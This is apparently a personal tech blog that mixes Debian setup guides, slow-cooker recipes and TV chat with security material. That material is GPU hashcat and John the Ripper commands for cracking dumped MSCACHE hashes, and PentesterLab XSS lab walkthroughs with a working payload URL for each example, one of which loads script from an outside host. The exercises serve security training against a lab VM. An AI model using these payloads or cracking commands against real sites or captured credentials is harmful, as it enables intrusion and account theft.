Debian Optirun/Bumblebee/Ironhide on GT 525M 1 GB and HashCat

So I have a nice little GPU in my testing laptop and have just got it running with Optirun/Bumblebee/Ironhide so I can use it with oclHashCat-Plus.

First you need to add the Debian Bumblebee repo:

$ sudo -s

# wget -O - http://suwako.nomanga.net/suwako.asc | apt-key add -

# nano /etc/apt/sources.list

add the following lines

deb http://suwako.nomanga.net/debian sid main contrib
deb-src http://suwako.nomanga.net/debian sid main

# apt-get update

# apt-get install bumblebee bumblebee-nvidia

# adduser {user} bumblebee

# reboot

Once your back on, test its working by running:

$ optirun glxgears -info

If you see three cogs pop up in a windows and they turn, it's game on!

Now a real test, hashcat. You need a few libs to run hashcat

$ sudo apt-get install -y libcuda1

$ cd /opt

$ wget http://hashcat.net/files/oclHashcat-plus-0.14.7z

$ sudo apt-get install p7zip

$ sudo 7zip -d oclHashcat-plus-0.14.7z

$ cd oclHashcat-plus-0.14

Now hashcat can be a bitch to use as every cmd option has to be in the right place; however, it's frick*n awesome, especially with a GPU and there's plenty of info on how to use it here.

Quick e.g using hashes dumped from MSCACHE, which I'm always attempting to crack ;-) -

./cudahashcat-plus64.bin -m 1100 {hash-file.cap} {wordlist.txt} -r rules/d3ad0ne.rule -o output.txt

Replace {hash-file.cap} with your captured hash file, hashcat will only accept them in the format - administrator:2758937hedfsdjkhgfjk and replace {wordlist.txt} with the wordlist of your choice.

Wordlists - there's only one for me:

http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2

Happy Cracking ;-)

Compiling Jumbo John (JTR) for MSCACHE Password Auditing

So to attempt a password audit on MSCACHE v2 password hashes you will need to compile John The Ripper Jumbo.

$ wget http://openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz

$ tar zxvf john-1.7.9-jumbo-7.tar.gz

$ cd john-1.7.9-jumbo-7/src/

$ make linux-x86-64 (for 64 bit OS)

$ sudo make install

John will be found in the 'run' directory

$ cd ../run

$ ./john --format=mscash {dumpfile.cap}

Loaded X password hashes with X different salts (M$ Cache Hash MD4 [32/64])

HTH

Debian Wheezy and Sun Java Development Kit

Due to Oracle's bullsh*t redistribution license it's not possible to install Sun Java 7 with the apt packaging manager.

So to install, we need to do a bit a manual malarchy

$ sudo -s

# cd /opt

# wget http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-linux-x64.tar.gz

# tar xvf jdk-7-linux-x64.tar.gz

# update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_17/bin/java 1

# update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_17/bin/javac 1

# update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so 1

# update-alternatives --set java /opt/jdk1.7.0_17/bin/java

# update-alternatives --set javac /opt/jdk1.7.0_17/bin/javac

# update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so

Now test that it's worked:


# java -version

java version "1.7.0_17"
Java(TM) SE Runtime Environment (build 1.7.0_17-b02)
Java HotSpot(TM) 64-Bit Server VM (build 23.7-b01, mixed mode)

Job done!

HTH

PentesterLab - Web For Pentester - XSS Example 9

This example is a DOM-based XSS. This page could actually be completely static
and still be vulnerable.

In this example, you will need to read the code of the page to understand what is
happening. When the page is rendered, the JavaScript code uses the current URL
to retrieve the anchor portion of the URL (#...) and dynamically (on the client side)
write it inside the page. This can be used to trigger a XSS if you use the payload as
part of the URL

Payload

http://192.168.56.101/xss/example9.php#Bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E

PentesterLab - Web For Pentester - XSS Example 8

Here, the value echoed back in the page is correctly encoded. However, there is still
a XSS in this page. To build the form, the developer used and trusted PHP_SELF
which is the path provide by the user.


Trusting the path provided by users is a common mistake and it can often be used
to trigger XSS along other issues. It's pretty common in pages with forms and in
error pages (404 and 500 pages).

Payload

http://192.168.56.101/xss/example8.php/%22%3E%3Cscript%3Ealert%28String.fromCharCode%2866,%20111,%2098,%2098,%20121,%2032,%2068,%2097,%20122,%20122,%20108,%20101,%20114%29%29%3C/script%3E

PentesterLab - Web For Pentester - XSS Example 7

This example is similar to the one before, however, you won't be able to use special
characters since they will be HTML encoded. As you will see, you don't really need
any of these characters.

This issue is common in PHP web application because the well known function
used to HTML-encode character (htmlentities) does not encode single quotes (')
unless you told it to using the ENT_QUOTES flag.

Payload

http://192.168.56.101/xss/example7.php?name=Bobby%27;alert%28String.fromCharCode%2868,%2097,%20122,%20122,%20108,%20101,%20114%29%29//

PentesterLab - Web For Pentester - XSS Example 6

Here, the source code of the HTML page is a bit different. If you read it, you will see
that the value you are sending is echoed back inside JavaScript code.

Payload

http://192.168.56.101/xss/example6.php?name=%3C?%20echo%28%27%3CSCR%29%27;echo%28%27IPT%3Ealert%28%22Dazzler%22%29%3C/SCRIPT%3EBobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E

PentesterLab - Web For Pentester - XSS Example 5

In this example, <script> tag is accepted and gets echoed back. But as soon as
you try to inject a call to alert, the PHP script stops its execution. The problem
seems to come from a filter on the word alert.

Payload

http://192.168.56.101/xss/example5.php?name=%3CSCRIPT/XSS%20SRC=%22http://ha.ckers.org/xss.js%22%3E%3C/SCRIPT%3E

Again, this isn't the way the paper wanted the alert box to be generated but it's still XSS all the same; just populated from an external source http://ha.ckers.org/xss/.js

PentesterLab - Web For Pentester - XSS Example 4

In this example, the developer decided to completely blacklist the word script: if
the request matches script, the execution stops.

Payload
http://192.168.56.101/xss/example4.php?name=%3Cdiv%20onmouseover=%27alert%281%29%27%20/%3E

PentesterLab - Web For Pentester - XSS Example 3

You notified the developer about your bypass. He added more filtering and now
seem to prevent your previous payload. However, he is making a terrible mistake in
his code (which was also present in the previous code)...

Payload

http://192.168.56.101/xss/example3.php?name=Bobby%3Cp%20onmouseover=alert%28%27Dazzl%27%29%3Eer%3C/p%3E

This isn't the way the paper wants you to pop the XSS but I had the payload correct and it wouldn't pop, the correct payload, that should of popped was:

http://192.168.56.101/xss/example3.php?name=Annoying<<script<>script>alert('Dazzler')<</script<>/script>

Which produced this:

If you know why this didn't work, feel free to comment!

PentesterLab - Web For Pentester - XSS Example 2

In the second example, a bit of filtering is involved. The web developer added some
regular expression to prevent the simple XSS payload to work.

Payload

http://192.168.56.101/xss/example2.php?name=Bobby<SCript>alert('Dazzler')</SCript>

PentesterLab - Web For Pentester - XSS Example 1

The first vulnerable example is just here to get you started with what is going on
when you find a XSS. Using the basic payload, you should be able to get an alert
box.

Payload:

http://192.168.56.101/xss/example1.php?name=bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E

RECIPE - Slow cooked Greek chicken

• Slow cooked Greek chicken

Another easy one, and the chicken will melt in your mouth ... trust me ;-)

• 
  
• 80g of any flour
• 1 teaspoon of salt
• 1/2 teaspoon dried oregano
• 6 x good quality chicken breast fillets, boneless & skinless
• 1 x Tin of Heinz, Cream of Chicken soup
• 125ml white wine 
• 1 x Knorr Chicken Stock Cube

1 - Mix the flour, salt and oregano together in a large bowl

2 - Score the chicken with a sharp knife, about half way through the breast

3 - Rub the mix into the breasts ;-)

4 - Mix your stock cube with 1/2 pint of boiling water and throw it in the slow cooker

5 - Add the wine and the chicken soup to the slow cooker

6 - Add the chicken breasts

7 - Cook for 4 hours on high or 8 hours on low.

Serve with sticky rice

B00000M

Debian 7 and Gnome

I'm a die hard Debian fan and was recently shocked to find there was no Gnome 2 in the new release, Wheezy.

I searched around a bit and found there was also no fall-back Gnome mode to Debian 7 (Wheezy), etiher. There is no way I can work with Gnome 3. Its a f*cking atrocity in my opinion. 

So I hit the forums and spoke to people to see what they are doing. Many mentioned Mate - Mate you ask?!

http://mate-desktop.org/

There she is, my lovely - Gnome 2 or now called Mate!

Mate is a fantastic fork of Gnome 2 and are continuing the goodness for all us die hard Gnome 2 fans out there.

How do I get this Mate, you ask?

Well it couldn't be easier, the instructions are all at http://wiki.mate-desktop.org/download but ill run through them, just so I can pad out this blog post:

sudo nano /etc/apt/sources.list

add the following line:

deb http://repo.mate-desktop.org/debian wheezy main

sudo apt-get update

sudo apt-get install mate-archive-keyring

sudo apt-get update

sudo apt-get install mate-desktop-environment-extra

sudo reboot

Now choose Mate from the list of Desktops on your login screen and sit back and enjoy the goodness of good ole Gnome 2.

HTH

Windows Bootable USB

Extracting the ISO to USB

First well need a few bits installed. I'm doing this on a Debian host but I'm sure the packages are there for EL or any other flavour ;-)

su -c `apt-get install ntfs-3g gparted -y

So then we need to clean up the USB stick with gparted.

Format it to ntfs using all the space.(Make sure you format the right drive, otherwise you'll FUBAR your OS) and make a note of the drive number.

Then we need a temporary mount point:

$ mkdir /tmp/windows_usb

Now we mount our ISO

$ mount windows_iso.iso /tmp/windows_usb

Now copy over then contents of your ISO to wherever your USB key is mounted, mines in 
/media/37265723dhgsdhg23857/

$ cp -r /tmp/windows_usb/* /media/

Will probably take a while depending on speed of USB key.

Now were going to need a little tool called ms-sys, and it probably wont be in your standard OS 
repo's, but it's at sourceforge and you'll also need to install some tools for building stuff from source:

$ sudo apt-get install build-essential module-assistant gettext-y

$ wget http://prdownloads.sourceforge.net/ms-sys/ms-sys-2.3.0.tar.gz

$ tar xvf ms-sys-2.3.0.tar.gz ; cd ms-sys-2.3.0 ; make ; sudo make install

If all is well you should have no errors and be ready to write a master boot record to the USB drive:

$ ms-sys -7 /dev/sd{?}

Replace {?} with the disk number of your device (noted from gparted)

Now you should have a bootable Windows USB key!

RECIPE - Slow Cooked Pork Chops

Slow Cooked Pork Chops

Another slow cook favourite of mine is the Pork Chops.

1/4 Mug of good olive oil
1 Mug of Chicken broth (Knorr pods are good)
2 Minced garlic cloves
1 Tablespoon of Paprika
1 Tablespoon of Garlic Powder
1 Teaspoon of dried oregano
1 Teaspoon of dried basil
4 thick cut pork chops
Salt + Black Pepper

Cut some scores about 1/2 way through the Pork chops and rub salt and black pepper into them.

Dissolve your Knorr chicken stock pod into a mug of boiling water and throw it into the slow cooker. Throw in the chopped garlic, paprika, garlic powder, oregano and basil.

Add the pork chops to the mix.

Turn every hour for four hours. Job done.

Serve with buttery mash or sticky rice.

Lurvly!

Windows XP SP2 Windows Update Error 0x80244019

So I had to build a Windows XP machine for some testing I was carrying out tonight and came across Error 0x80244019 when trying to run Windows Update.

It turns out the Microsoft have blocked IE6 from accessing the Windows Update web site and downloading the Windows Update 3.1 Active X controls.

So what you need to do is, download and install IE8 and Windows Update Services in the following order:

1. Upgrade to Internet Explorer 8 (IE8)
DOWNLOAD
2. Reboot Machine.
3. Download Windows Update Agent
DOWNLOAD
4. Save the .exe file to your C: drive
5. Click Start, and then click Run. 
6. Type "C:\WindowsUpdateAgent30-x86.exe /wuforce"  then click OK
7. Install Windows Update agent.
8. Restart the PC and try Windows Updates again.


You should now be able to install the Windows Update Active X control and begin installing the mammoth amount of updates that your XPSP2 build will be missing.

HTH

Installing Virutal Box Guest Additions on Debian

I had a little nightmare with this and couldn't get my head round why I didnt have the kernel headers even though I had installed build-essential. So here's how I did it.

sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get install build-essential module-assistant -y
sudo m-a prepare -y

Click on Install Guest Additions from the Devices menu:

Then cancel the autorun prompt as that never works!

Finally,
sudo sh /media/cdrom/VBoxLinuxAdditions.run, and follow the instructions on screen

Restart your VM and it should be job done.

HTH!

End of Season Walking Dead and New Show, Defiance

Last night the wife finally dragged me away from the 'puter to watch some TV with her. It does happen every now and again, depending on my workload.

So, over the bank holiday weekend we caught up with Walking Dead and Elementary. Walking Dead is one of my favourite shows but it is starting to get predictable. *SPOILER* I knew Rick wouldn't live in Woodbury with his guy's so there was only one other option. I just wish AMC would let us have a few more episodes in a season than 7, so until October....

Elementary continues to keep both the wife and I absorbed. We love it! I never thought the Americans would be able to pull it off, but they have. Takes a Brit' to do it though ;-). Jonny Lee Miller is pure class but it did take me five or six episodes, to get it out of my head that he isn't Crash Override/Acid Burn or Sickboy any more :-(

However, last night we started a new show called Defiance. It's been recommended by a few people and to be fair, the Pilot episode is pretty good. I kept leaving the living room to fetch books as I was playing with the Twisted Python modules, so we only watched the pilot show. Some of the CGI scenes were a bit budget, but the show is being broadcast on the SyFy channel. However, Falling Skies, back 6/6/13, was first broadcast on a budget channel, TNT, and that show is EPIC!

Defiance Header

See you in 5 hours casserole......

So, I don't think you cant beat a recipe as a first post. This one's one of my favourites, primarily 'cause im lazy.

When I know the wife or I wont want to cook in the evening, I break-out the slow cooker just after lunch.

Chuck all the ingredients in, and im not joking. i literally run a knife through veg and meat and throw it in the cooker with a pint and a half of stock (usually bisto) ;-)

For the full recipe - see 'Easy Slow Cook braised beef'

RECIPE - Easy Slow Cook Braised Beef

Easy Slow Cook Braised Beef

I'm usually a busy boy during the week so, sometimes, just after lunch, I turn the slow cooker on and add the following:

3 Large Braising Steak's - Cubed
3 Large Carrots - roughly sliced
2 Leeks - roughly sliced
1/2 Swede - roughly diced
2 Onions - roughly diced
4 Potatoes - cubed  (or halved depending on size)
2 Cloves of fresh garlic - crushed not sliced
1+1/2 pints of beef stock (cold)
Salt + Black Pepper

Chuck it all in the slow-cooker, stick it on high, and come back in 5 hours. Job done.